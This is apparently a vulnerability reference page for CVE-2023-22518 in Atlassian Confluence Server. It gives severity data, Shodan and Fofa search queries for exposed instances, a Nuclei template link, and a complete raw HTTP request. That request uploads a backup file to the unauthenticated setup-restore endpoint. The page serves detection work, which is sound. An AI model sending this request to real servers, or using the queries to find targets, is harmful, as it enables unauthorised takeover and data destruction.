🔙 목록으로 돌아가기

CVE-2023-22518: Atlassian Confluence Server - Improper Authorization

TitleAtlassian Confluence Server - Improper Authorization
Authoriamnoooob,rootxharsh,pdresearch
SeverityCritical
ImpactUnauthenticated attackers can exploit improper authorization to upload malicious backup files through the setup-restore endpoint, potentially resetting the database and gaining administrative access to Confluence Server data.
RemediationUpdate Atlassian Confluence Data Center and Server to a patched version that properly authorizes access to the setup-restore.action endpoint.
CVSS Score9.8
EPSS Score0.94375
CVE IDCVE-2023-22518
CWE IDCWE-863
Shodan Queryhttp.component:"Atlassian Confluence"http.component:"atlassian confluence"
Fofa Queryapp="atlassian-confluence"
Tags cve cve2023 atlassian confluence rce unauth intrusive kev vkev vuln

🔍 Vulnerability Description

All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

🌐 HTTP Request

POST /json/setup-restore.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 415
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7
X-Atlassian-Token: no-check
Accept-Encoding: gzip

------WebKitFormBoundaryT3yekvo0rGaL9QR7

Content-Disposition: form-data; name="buildIndex"



false

------WebKitFormBoundaryT3yekvo0rGaL9QR7

Content-Disposition: form-data; name="file";filename="38EtrVFIVax1InXYhqBxz3sQ6g9.zip"



38EtrVFIVax1InXYhqBxz3sQ6g9

------WebKitFormBoundaryT3yekvo0rGaL9QR7

Content-Disposition: form-data; name="edit"



Upload and import

------WebKitFormBoundaryT3yekvo0rGaL9QR7--

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-22518.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-22518.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A